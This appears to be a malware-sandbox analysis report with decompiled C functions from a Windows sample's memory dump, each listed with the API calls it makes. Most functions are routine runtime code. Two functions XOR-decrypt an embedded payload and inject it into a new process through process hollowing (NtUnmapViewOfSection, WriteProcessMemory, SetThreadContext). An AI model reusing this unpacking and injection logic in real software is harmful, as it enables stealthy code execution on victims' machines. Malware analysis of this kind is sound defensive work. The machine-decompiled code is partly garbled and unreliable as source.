    										L91:
    										__eflags =  *(__ebp - 0x18);
    										if( *(__ebp - 0x18) != 0) {
    											goto L93;
    										}
    										L92:
    										__eflags =  *(__ebp - 0x1a);
    										if( *(__ebp - 0x1a) == 0) {
    											goto L109;
    										}
    										goto L93;
    									case 0xd:
    										L94:
    										__eflags =  *0x454681;
    										__eflags = __eax - 0x454681;
    										 *__edi =  *__edi + __cl;
    										__eflags =  *(__ecx - 0x75000000) & __bl;
    									case 0xe:
    										L97:
    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}


















    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}




















    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}






    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0024E0C6
